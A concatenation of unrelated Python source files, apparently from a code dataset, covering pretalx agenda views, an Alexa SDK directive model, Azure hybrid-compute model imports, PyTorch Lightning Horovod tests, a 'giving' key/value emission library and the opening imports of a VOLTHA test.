context['submission_description'] = (
submission.description
or submission.abstract
or _('The talk »{title}« at {event}').format(
title=submission.title, event=submission.event.name
)
)
context['recording_iframe'] = self.recording.get('iframe')
context['answers'] = submission.answers.filter(
question__is_public=True,
question__event=self.request.event,
question__target=QuestionTarget.SUBMISSION,
)
context['speakers'] = []
other_submissions = schedule.slots.exclude(pk=submission.pk)
for speaker in submission.speakers.all():
speaker.talk_profile = speaker.event_profile(event=self.request.event)
speaker.other_submissions = other_submissions.filter(speakers__in=[speaker])
context['speakers'].append(speaker)
return context
class TalkReviewView(DetailView):
model = Submission
slug_field = 'review_code'
template_name = 'agenda/talk.html'
class SingleICalView(EventPageMixin, DetailView):
model = Submission
slug_field = 'code'
def get(self, request, event, **kwargs):
talk = (
self.get_object()
.slots.filter(schedule=self.request.event.current_schedule, is_visible=True)
.first()
)
if not talk:
raise Http404()
netloc = urlparse(settings.SITE_URL).netloc
cal = vobject.iCalendar()
cal.add('prodid').value = '-//pretalx//{}//{}'.format(
netloc, talk.submission.code
)
talk.build_ical(cal)
code = talk.submission.code
resp = HttpResponse(cal.serialize(), content_type='text/calendar')
resp[
'Content-Disposition'
] = f'attachment; filename="{request.event.slug}-{code}.ics"'
return resp
class FeedbackView(PermissionRequired, FormView):
model = Feedback
form_class = FeedbackForm
template_name = 'agenda/feedback_form.html'
permission_required = 'agenda.give_feedback'
def get_object(self):
return Submission.objects.filter(
event=self.request.event,
code__iexact=self.kwargs['slug'],
slots__in=self.request.event.current_schedule.talks.filter(is_visible=True),
).first()
def get(self, *args, **kwargs):
talk = self.get_object()
if talk and self.request.user in talk.speakers.all():
return render(
self.request,
'agenda/feedback.html',
context={
'talk': talk,
'feedback': talk.feedback.filter(
Q(speaker__isnull=True) | Q(speaker=self.request.user)
),
},
)
return super().get(*args, **kwargs)
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['talk'] = self.get_object()
return kwargs
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['talk'] = self.get_object()
return context
def form_valid(self, form):
result = super().form_valid(form)
form.save()
messages.success(self.request, phrases.agenda.feedback_success)
return result
def get_success_url(self):
return self.get_object().urls.public
|
py | 1a38b0b69419b7c969532edd6ae5c5382edc3a61 | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
from ask_sdk_model.directive import Directive
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional
from datetime import datetime
class RenderDocumentDirective(Directive):
"""
:param token: A unique identifier for the presentation.
:type token: (optional) str
:param document: The APL document that the devices need to render a presentation.
:type document: (optional) dict(str, object)
:param datasources: Data sources to bind to the document when rendering.
:type datasources: (optional) dict(str, object)
:param packages: A list of packages including layouts, styles, and images etc.
:type packages: (optional) list[object]
"""
deserialized_types = {
'object_type': 'str',
'token': 'str',
'document': 'dict(str, object)',
'datasources': 'dict(str, object)',
'packages': 'list[object]'
}
attribute_map = {
'object_type': 'type',
'token': 'token',
'document': 'document',
'datasources': 'datasources',
'packages': 'packages'
}
def __init__(self, token=None, document=None, datasources=None, packages=None):
# type: (Optional[str], Optional[Dict[str, object]], Optional[Dict[str, object]], Optional[List[object]]) -> None
"""
:param token: A unique identifier for the presentation.
:type token: (optional) str
:param document: The APL document that the devices need to render a presentation.
:type document: (optional) dict(str, object)
:param datasources: Data sources to bind to the document when rendering.
:type datasources: (optional) dict(str, object)
:param packages: A list of packages including layouts, styles, and images etc.
:type packages: (optional) list[object]
"""
self.__discriminator_value = "Alexa.Presentation.APL.RenderDocument"
self.object_type = self.__discriminator_value
super(RenderDocumentDirective, self).__init__(object_type=self.__discriminator_value)
self.token = token
self.document = document
self.datasources = datasources
self.packages = packages
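# Usage sketch (document and datasources contents are illustrative):
#   directive = RenderDocumentDirective(
#       token='pagerToken',
#       document={'type': 'APL', 'version': '1.0', 'mainTemplate': {...}},
#       datasources={'pagerTemplateData': {...}})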
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, RenderDocumentDirective):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
|
py | 1a38b11bd0d2bdb55db4010ceecc766c6ae473d0 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import ErrorDetail
from ._models_py3 import ErrorResponse
from ._models_py3 import Identity
from ._models_py3 import LocationData
from ._models_py3 import Machine
from ._models_py3 import MachineExtension
from ._models_py3 import MachineExtensionInstanceView
from ._models_py3 import MachineExtensionInstanceViewStatus
from ._models_py3 import MachineExtensionProperties
from ._models_py3 import MachineExtensionPropertiesAutoGenerated
from ._models_py3 import MachineExtensionPropertiesInstanceView
from ._models_py3 import MachineExtensionUpdate
from ._models_py3 import MachineExtensionUpdateProperties
from ._models_py3 import MachineExtensionUpdatePropertiesAutoGenerated
from ._models_py3 import MachineExtensionsListResult
from ._models_py3 import MachineIdentity
from ._models_py3 import MachineListResult
from ._models_py3 import MachineProperties
from ._models_py3 import MachinePropertiesAutoGenerated
from ._models_py3 import MachinePropertiesOsProfile
from ._models_py3 import MachineUpdate
from ._models_py3 import MachineUpdateIdentity
from ._models_py3 import MachineUpdateProperties
from ._models_py3 import MachineUpdatePropertiesAutoGenerated
from ._models_py3 import OSProfile
from ._models_py3 import OperationListResult
from ._models_py3 import OperationValue
from ._models_py3 import OperationValueDisplay
from ._models_py3 import OperationValueDisplayAutoGenerated
from ._models_py3 import Resource
from ._models_py3 import TrackedResource
from ._models_py3 import UpdateResource
except (SyntaxError, ImportError):
from ._models import ErrorDetail # type: ignore
from ._models import ErrorResponse # type: ignore
from ._models import Identity # type: ignore
from ._models import LocationData # type: ignore
from ._models import Machine # type: ignore
from ._models import MachineExtension # type: ignore
from ._models import MachineExtensionInstanceView # type: ignore
from ._models import MachineExtensionInstanceViewStatus # type: ignore
from ._models import MachineExtensionProperties # type: ignore
from ._models import MachineExtensionPropertiesAutoGenerated # type: ignore
from ._models import MachineExtensionPropertiesInstanceView # type: ignore
from ._models import MachineExtensionUpdate # type: ignore
from ._models import MachineExtensionUpdateProperties # type: ignore
from ._models import MachineExtensionUpdatePropertiesAutoGenerated # type: ignore
from ._models import MachineExtensionsListResult # type: ignore
from ._models import MachineIdentity # type: ignore
from ._models import MachineListResult # type: ignore
from ._models import MachineProperties # type: ignore
from ._models import MachinePropertiesAutoGenerated # type: ignore
from ._models import MachinePropertiesOsProfile # type: ignore
from ._models import MachineUpdate # type: ignore
from ._models import MachineUpdateIdentity # type: ignore
from ._models import MachineUpdateProperties # type: ignore
from ._models import MachineUpdatePropertiesAutoGenerated # type: ignore
from ._models import OSProfile # type: ignore
from ._models import OperationListResult # type: ignore
from ._models import OperationValue # type: ignore
from ._models import OperationValueDisplay # type: ignore
from ._models import OperationValueDisplayAutoGenerated # type: ignore
from ._models import Resource # type: ignore
from ._models import TrackedResource # type: ignore
from ._models import UpdateResource # type: ignore
from ._hybrid_compute_management_client_enums import (
InstanceViewTypes,
StatusLevelTypes,
StatusTypes,
)
__all__ = [
'ErrorDetail',
'ErrorResponse',
'Identity',
'LocationData',
'Machine',
'MachineExtension',
'MachineExtensionInstanceView',
'MachineExtensionInstanceViewStatus',
'MachineExtensionProperties',
'MachineExtensionPropertiesAutoGenerated',
'MachineExtensionPropertiesInstanceView',
'MachineExtensionUpdate',
'MachineExtensionUpdateProperties',
'MachineExtensionUpdatePropertiesAutoGenerated',
'MachineExtensionsListResult',
'MachineIdentity',
'MachineListResult',
'MachineProperties',
'MachinePropertiesAutoGenerated',
'MachinePropertiesOsProfile',
'MachineUpdate',
'MachineUpdateIdentity',
'MachineUpdateProperties',
'MachineUpdatePropertiesAutoGenerated',
'OSProfile',
'OperationListResult',
'OperationValue',
'OperationValueDisplay',
'OperationValueDisplayAutoGenerated',
'Resource',
'TrackedResource',
'UpdateResource',
'InstanceViewTypes',
'StatusLevelTypes',
'StatusTypes',
]
|
py | 1a38b12d37ba02758e99a267621af7ba292ccd08 | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import platform
import shlex
import subprocess
import sys
import numpy as np
import pytest
import torch
from sklearn.metrics import accuracy_score
import tests.base.develop_pipelines as tpipes
import tests.base.develop_utils as tutils
from pytorch_lightning import Trainer
from pytorch_lightning.accelerators.horovod_accelerator import HorovodAccelerator
from pytorch_lightning.core.step_result import EvalResult, Result, TrainResult
from pytorch_lightning.metrics.classification.accuracy import Accuracy
from pytorch_lightning.utilities import APEX_AVAILABLE, NATIVE_AMP_AVAILABLE, HOROVOD_AVAILABLE, _module_available
from tests.base import EvalModelTemplate
from tests.base.boring_model import BoringModel
from tests.base.models import BasicGAN
if HOROVOD_AVAILABLE:
import horovod
import horovod.torch as hvd
# This script will run the actual test model training in parallel
TEST_SCRIPT = os.path.join(os.path.dirname(__file__), 'data', 'horovod', 'train_default_model.py')
try:
from horovod.common.util import nccl_built
nccl_built()
HOROVOD_NCCL_AVAILABLE = True
except (ImportError, ModuleNotFoundError, AttributeError):
HOROVOD_NCCL_AVAILABLE = False
def _run_horovod(trainer_options, on_gpu=False):
"""Execute the training script across multiple workers in parallel."""
num_processes = trainer_options.get('gpus', 2)
# for Horovod, we interpret `gpus` to be set per worker
trainer_options.update(gpus=1 if on_gpu else None)
tutils.reset_seed()
cmdline = [
'horovodrun',
'-np', str(num_processes),
sys.executable, TEST_SCRIPT,
'--trainer-options', shlex.quote(json.dumps(trainer_options))
]
if on_gpu:
cmdline += ['--on-gpu']
exit_code = subprocess.call(' '.join(cmdline), shell=True, env=os.environ.copy())
assert exit_code == 0
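# The assembled command looks like (paths and options are illustrative):
#   horovodrun -np 2 /usr/bin/python .../data/horovod/train_default_model.py \
#       --trainer-options '{"max_epochs": 1, ...}'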
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_cpu(enable_pl_optimizer, tmpdir):
"""Test Horovod running multi-process on CPU."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
distributed_backend='horovod',
deterministic=True,
enable_pl_optimizer=enable_pl_optimizer,
)
_run_horovod(trainer_options)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_cpu_implicit(enable_pl_optimizer, tmpdir):
"""Test Horovod without specifying a backend, inferring from env set by `horovodrun`."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
deterministic=True,
enable_pl_optimizer=enable_pl_optimizer,
)
_run_horovod(trainer_options)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
def test_horovod_multi_gpu(tmpdir):
"""Test Horovod with multi-GPU support."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod'
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(not APEX_AVAILABLE, reason="test requires apex")
def test_horovod_apex(tmpdir):
"""Test Horovod with multi-GPU support using apex amp."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod',
amp_backend='apex',
precision=16,
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skip(reason="Skip till Horovod fixes integration with Native torch.cuda.amp")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="test requires multi-GPU machine")
@pytest.mark.skipif(not NATIVE_AMP_AVAILABLE, reason="test requires torch.cuda.amp")
def test_horovod_amp(tmpdir):
"""Test Horovod with multi-GPU support using native amp."""
trainer_options = dict(
default_root_dir=str(tmpdir),
weights_save_path=str(tmpdir),
gradient_clip_val=1.0,
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=2,
deterministic=True,
distributed_backend='horovod',
amp_backend='native',
precision=16,
)
_run_horovod(trainer_options, on_gpu=True)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.skipif(not HOROVOD_NCCL_AVAILABLE, reason="test requires Horovod with NCCL support")
@pytest.mark.skipif(not torch.cuda.is_available(), reason="test requires GPU machine")
def test_horovod_transfer_batch_to_gpu(tmpdir):
class TestTrainingStepModel(EvalModelTemplate):
def training_step(self, batch, *args, **kwargs):
x, y = batch
assert str(x.device) != 'cpu'
assert str(y.device) != 'cpu'
return super(TestTrainingStepModel, self).training_step(batch, *args, **kwargs)
def validation_step(self, batch, *args, **kwargs):
x, y = batch
assert str(x.device) != 'cpu'
assert str(y.device) != 'cpu'
return super(TestTrainingStepModel, self).validation_step(batch, *args, **kwargs)
hparams = EvalModelTemplate.get_default_hparams()
model = TestTrainingStepModel(**hparams)
trainer_options = dict(
default_root_dir=str(tmpdir),
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
gpus=1,
deterministic=True,
distributed_backend='horovod'
)
tpipes.run_model_test_without_loggers(trainer_options, model)
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_horovod_multi_optimizer(enable_pl_optimizer, tmpdir):
model = BasicGAN(**EvalModelTemplate.get_default_hparams())
# fit model
trainer = Trainer(
default_root_dir=str(tmpdir),
progress_bar_refresh_rate=0,
max_epochs=1,
limit_train_batches=0.4,
limit_val_batches=0.2,
deterministic=True,
distributed_backend='horovod',
enable_pl_optimizer=enable_pl_optimizer,
)
result = trainer.fit(model)
assert result == 1, 'model failed to complete'
assert len(trainer.optimizers) == 2
for i, optimizer in enumerate(trainer.optimizers):
assert hasattr(optimizer, 'synchronize'), 'optimizer has not been wrapped into DistributedOptimizer'
def get_model_params(model):
return set([p for p in model.parameters()])
def get_optimizer_params(optimizer):
return set([p for group in optimizer.param_groups for p in group.get('params', [])])
assert get_model_params(model.generator) != get_model_params(model.discriminator)
assert get_model_params(model.generator) == get_optimizer_params(trainer.optimizers[0])
assert get_model_params(model.discriminator) == get_optimizer_params(trainer.optimizers[1])
@pytest.mark.skipif(not HOROVOD_AVAILABLE, reason="Horovod is unavailable")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
@pytest.mark.parametrize("enable_pl_optimizer", [False, True])
def test_result_reduce_horovod(enable_pl_optimizer, tmpdir):
"""Make sure result logging works with Horovod.
This test mirrors tests/core/test_results.py::_ddp_test_fn
"""
tutils.reset_seed()
tutils.set_random_master_port()
def hvd_test_fn():
path_here = os.path.abspath(os.path.dirname(__file__))
path_root = os.path.abspath(os.path.join(path_here, '..', '..'))
sys.path.insert(0, os.path.abspath(path_root))
class TestModel(BoringModel):
def training_step(self, batch, batch_idx):
self.training_step_called = True
tensor = torch.tensor([1.0])
self.log("test_tensor", tensor, sync_dist=True, sync_dist_op='sum',
on_step=True, on_epoch=True)
res = self._results
# Check that `tensor` is summed across all ranks automatically
assert res["test_tensor"].item() == hvd.size(), \
"Result-Log does not work properly with Horovod and Tensors"
def training_epoch_end(self, outputs) -> None:
assert len(outputs) == 0
model = TestModel()
model.val_dataloader = None
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
enable_pl_optimizer=enable_pl_optimizer,
)
trainer.fit(model)
horovod.run(hvd_test_fn, np=2)
@pytest.mark.skipif(not HOROVOD_AVAILABLE, reason="Horovod is unavailable")
@pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
def test_accuracy_metric_horovod():
num_batches = 10
batch_size = 16
threshold = 0.5
def sk_metric(preds, target):
sk_preds = (preds.view(-1).numpy() >= threshold).astype(np.uint8)
sk_target = target.view(-1).numpy()
return accuracy_score(y_true=sk_target, y_pred=sk_preds)
preds = torch.rand(num_batches, batch_size)
target = torch.randint(high=2, size=(num_batches, batch_size))
def _compute_batch():
trainer = Trainer(
fast_dev_run=True,
distributed_backend='horovod',
)
accelerator_backend = trainer.accelerator_connector.select_accelerator()
assert isinstance(accelerator_backend, HorovodAccelerator)
metric = Accuracy(compute_on_step=True,
dist_sync_on_step=True,
dist_sync_fn=accelerator_backend.gather_all_tensors,
threshold=threshold)
for i in range(hvd.rank(), num_batches, hvd.size()):
batch_result = metric(preds[i], target[i])
if hvd.rank() == 0:
dist_preds = torch.stack([preds[i + r] for r in range(hvd.size())])
dist_target = torch.stack([target[i + r] for r in range(hvd.size())])
sk_batch_result = sk_metric(dist_preds, dist_target)
assert np.allclose(batch_result.numpy(), sk_batch_result)
# check on all batches on all ranks
result = metric.compute()
assert isinstance(result, torch.Tensor)
total_preds = torch.stack([preds[i] for i in range(num_batches)])
total_target = torch.stack([target[i] for i in range(num_batches)])
sk_result = sk_metric(total_preds, total_target)
assert np.allclose(result.numpy(), sk_result)
horovod.run(_compute_batch, np=2)
# @pytest.mark.skipif(platform.system() == "Windows", reason="Horovod is not supported on Windows")
# def test_horovod_multi_optimizer_with_scheduling_stepping(tmpdir):
# hparams = EvalModelTemplate.get_default_hparams()
# model = EvalModelTemplate(**hparams)
# model.configure_optimizers = model.configure_optimizers__multiple_schedulers
#
# num_workers = 8
# init_lr = hparams.get('learning_rate') * num_workers
#
# with patch('pytorch_lightning.accelerators.horovod_backend.hvd.size') as mock_hvd_size:
# mock_hvd_size.return_value = 8
#
# # fit model
# trainer = Trainer(
# default_root_dir=tmpdir,
# max_epochs=1,
# limit_val_batches=0.5,
# limit_train_batches=0.2,
# distributed_backend='horovod'
# )
# results = trainer.fit(model)
# assert results == 1
#
# adjusted_lr1 = [pg['lr'] for pg in trainer.optimizers[0].param_groups][0]
# adjusted_lr2 = [pg['lr'] for pg in trainer.optimizers[1].param_groups][0]
#
# # Called ones after end of epoch with gamma=0.1
# assert pytest.approx(init_lr * 0.1) == adjusted_lr1
#
# # Called every 3 steps, meaning for 1 epoch of 11 batches, it is called 3 times with gamma=0.1
# assert pytest.approx(init_lr * 0.1) == adjusted_lr2
|
py | 1a38b13744af4dc3d4ef1b541f4a470a2a491df9 | import ast
import sys
import time
from collections import namedtuple
from contextlib import contextmanager
from contextvars import ContextVar
from itertools import count
from varname import ImproperUseError, VarnameRetrievingError, argname, varname
from varname.utils import get_node
global_context = ContextVar("global_context", default=())
global_inherited = ContextVar("global_inherited", default={})
_block_classes = {
ast.If: ("body", "orelse"),
ast.For: ("body", "orelse"),
ast.While: ("body", "orelse"),
ast.FunctionDef: ("body",),
ast.AsyncFunctionDef: ("body",),
ast.With: ("body",),
ast.AsyncWith: ("body",),
ast.AsyncFor: ("body", "orelse"),
}
_improper_nullary_give_error = (
"give() with no arguments must immediately follow an assignment"
)
special_keys = {}
global_count = count(0)
def register_special(key):
"""Return a decorator to register a function for a special key.
The function is called with no arguments whenever the special key is
requested, e.g. with ``Giver(special=["$specialkey"])``.
Use ``sys._getframe(3)`` to get the frame in which give() was called.
Example:
.. code-block:: python
@register_special("$time")
def _special_time():
return time.time()
Arguments:
key: The key, conventionally starting with a "$".
"""
def deco(func):
special_keys[key] = func
return func
return deco
@register_special("$time")
def _special_time():
return time.time()
@register_special("$frame")
def _special_frame():
return sys._getframe(3)
LinePosition = namedtuple("LinePosition", ["name", "filename", "lineno"])
@register_special("$line")
def _special_line():
fr = sys._getframe(3)
co = fr.f_code
return LinePosition(co.co_name, co.co_filename, fr.f_lineno)
def _find_targets(target):
if isinstance(target, ast.Tuple):
results = []
for t in target.elts:
results += _find_targets(t)
return results
else:
return [target.id]
def _find_above(frame):
node = get_node(frame + 1)
if node is None:
raise VarnameRetrievingError(
"Cannot retrieve the node where the function is called"
)
while node.parent is not None:
parent = node.parent
fields = _block_classes.get(type(parent), None)
if fields is None:
node = parent
continue
else:
for field in fields:
f = getattr(parent, field)
if node in f:
idx = f.index(node)
if idx == 0:
raise ImproperUseError(_improper_nullary_give_error)
assignment = f[idx - 1]
if isinstance(assignment, ast.Assign):
target = assignment.targets[-1]
names = _find_targets(target)
elif isinstance(assignment, (ast.AugAssign, ast.AnnAssign)):
names = [assignment.target.id]
else:
raise ImproperUseError(_improper_nullary_give_error)
fr = sys._getframe(frame)
rval = {}
for name in names:
if name in fr.f_locals:
rval[name] = fr.f_locals[name]
elif name in fr.f_globals:
rval[name] = fr.f_globals[name]
else: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not resolve value")
return rval
else: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not find node position")
# I am not sure how to trigger this
raise Exception("Could not find node") # pragma: no cover
def resolve(frame, func, args):
"""Return a {variable_name: value} dictionary depending on usage.
* ``len(args) == 0`` => Use the variable assigned in the line before the call.
* ``len(args) == 1`` => Use the variable the call is assigned to.
* ``len(args) >= 2`` (or one unassigned argument) => Use the variables passed as arguments to the call.
Arguments:
frame: The number of frames to go up to find the context.
func: The Giver object that was called.
args: The arguments given to the Giver.
"""
nargs = len(args)
if nargs == 0:
return _find_above(frame=frame + 2)
if nargs == 1:
try:
assigned_to = varname(frame=frame + 1, strict=True, raise_exc=False)
except ImproperUseError:
assigned_to = None
if assigned_to is not None:
return {assigned_to: args[0]}
argnames = argname("args", func=func, frame=frame + 1, vars_only=False)
if argnames is None: # pragma: no cover
# I am not sure how to trigger this
raise Exception("Could not resolve arg names")
return {name: value for name, value in zip(argnames, args)}
class Giver:
"""Giver of key/value pairs.
``Giver`` is the class of the ``give`` object.
Arguments:
keys:
List of default keys to give. If ``keys=["x"]``, then
``self(123)`` will give ``{"x": 123}``.
special:
List of special keys to give (e.g. "$line", "$time", etc.)
extra:
Extra key/value pairs to give.
context:
The ContextVar that contains a list of handlers to call
when something is given.
inherited:
A ContextVar to use for inherited key/value pairs to give,
as set by ``with self.inherit(key=value): ...``.
transform:
A function from dict to dict that modifies the values to
give.
"""
def __init__(
self,
*,
keys=None,
special=[],
extra={},
context=global_context,
inherited=global_inherited,
transform=None,
):
self.keys = keys
self.special = special
self.extra = extra
self.context = context
self.inherited = inherited
self.transform = transform
def copy(
self,
keys=None,
special=None,
extra=None,
context=None,
inherited=None,
transform=None,
):
"""Copy this Giver with modified parameters."""
return type(self)(
keys=self.keys if keys is None else keys,
special=self.special if special is None else special,
extra=self.extra if extra is None else extra,
context=self.context if context is None else context,
inherited=self.inherited if inherited is None else inherited,
transform=self.transform if transform is None else transform,
)
@property
def line(self):
"""Return a giver that gives the line where it is called."""
return self.copy(special=(*self.special, "$line"))
@property
def time(self):
"""Return a giver that gives the time where it is called."""
return self.copy(special=(*self.special, "$time"))
@contextmanager
def inherit(self, **keys):
"""Create a context manager within which extra values are given.
.. code-block:: python
with give.inherit(a=1):
give(b=2) # gives {"a": 1, "b": 2}
Arguments:
keys: The key/value pairs to give within the block.
"""
inh = self.inherited.get()
token = self.inherited.set({**inh, **keys})
try:
yield
finally:
self.inherited.reset(token)
@contextmanager
def wrap(self, name, **keys):
"""Create a context manager that marks the beginning/end of the block.
``wrap`` first creates a unique ID to identify the block, then gives
the ``$wrap`` sentinel with name, uid and step="begin" at the beginning
of the block, and gives the same ``$wrap`` with step="end" at the end
of the block.
:meth:`giving.gvn.ObservableProxy.wrap` is the corresponding
method on the ObservableProxy returned by ``given()`` and it
can be used to wrap another context manager on the same block.
:meth:`giving.gvn.ObservableProxy.group_wrap` is another method
that uses the sentinels produced by ``wrap``.
.. code-block:: python
with give.wrap("W", x=1): # gives: {"$wrap": {"name": "W", "step": "begin", "id": ID}, "x": 1}
...
# end block, gives: {"$wrap": {"name": "W", "step": "end", "id": ID}, "x": 1}
Arguments:
name: The name to associate to this wrap block.
keys: Extra key/value pairs to give along with the sentinels.
"""
num = next(global_count)
self.produce({"$wrap": {"name": name, "step": "begin", "id": num}, **keys})
try:
yield
finally:
self.produce({"$wrap": {"name": name, "step": "end", "id": num}, **keys})
@contextmanager
def wrap_inherit(self, name, **keys):
"""Shorthand for using wrap and inherit.
.. code-block:: python
with give.wrap_inherit("W", a=1):
...
Is equivalent to:
.. code-block:: python
with give.inherit(a=1):
with give.wrap("W"):
...
Arguments:
name: The name to associate to this wrap block.
keys: Key/value pairs to inherit.
"""
with self.inherit(**keys):
with self.wrap(name):
yield
def produce(self, values):
"""Give the values dictionary."""
for special in self.special:
values[special] = special_keys[special]()
if self.extra:
values = {**self.extra, **values}
inh = self.inherited.get()
if inh is not None:
values = {**inh, **values}
for handler in self.context.get():
handler(values)
def variant(self, fn):
"""Create a version of give that transforms the data.
.. code-block:: python
@give.variant
def give_image(data):
return {"image": data}
...
give_image(x, y) # gives {"image": {"x": x, "y": y}}
Arguments:
fn: A function from a dict to a dict.
"""
return self.copy(transform=fn)
def __call__(self, *args, **values):
"""Give the args and values."""
h = self.context.get()
if h:
if self.keys:
if len(args) != len(self.keys):
raise ImproperUseError(
f"Giver for {self.keys} must have {len(self.keys)} positional argument(s)."
)
keyed = dict(zip(self.keys, args))
values = {**keyed, **values}
elif args:
values = {**resolve(1, self, args), **values}
elif not values:
values = resolve(1, self, ())
if self.transform:
values = self.transform(values)
self.produce(values)
if len(args) == 1:
return args[0]
else:
return None
def giver(*keys, **extra):
"""Create a Giver to give the specified keys, plus extra values.
.. code-block:: python
g = giver("x", y=1)
g(3) # gives {"x": 3, "y": 1}
"""
normal = [k for k in keys if not k.startswith("$")]
special = [k for k in keys if k.startswith("$")]
return Giver(keys=normal, special=special, extra=extra)
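# --- Hedged usage sketch (illustration only, not part of the module): wire a
# plain list.append as a handler on `global_context`, which Giver.produce()
# iterates, then exercise the keyword and keyed forms of give.
if __name__ == "__main__":
    give = Giver()
    logged = []
    token = global_context.set((logged.append,))
    try:
        give(x=1)  # explicit keyword: gives {"x": 1}
        g = giver("a", tag="demo")
        g(3)  # positional value mapped to key "a"; extra "tag" merged in
    finally:
        global_context.reset(token)
    print(logged)  # [{'x': 1}, {'tag': 'demo', 'a': 3}]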
|
py | 1a38b1cdc51da7d4f517c932d90623d3f365ab7d | #
# Copyright 2018 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from hashlib import md5
from unittest import TestCase, main
from nose.tools import raises
from nose.twistedtools import deferred
from copy import deepcopy
from .mock.mock_adapter_agent import MockAdapterAgent, MockCore
from .mock.mock_onu_handler import MockOnuHandler
from .mock.mock_olt_handler import MockOltHandler
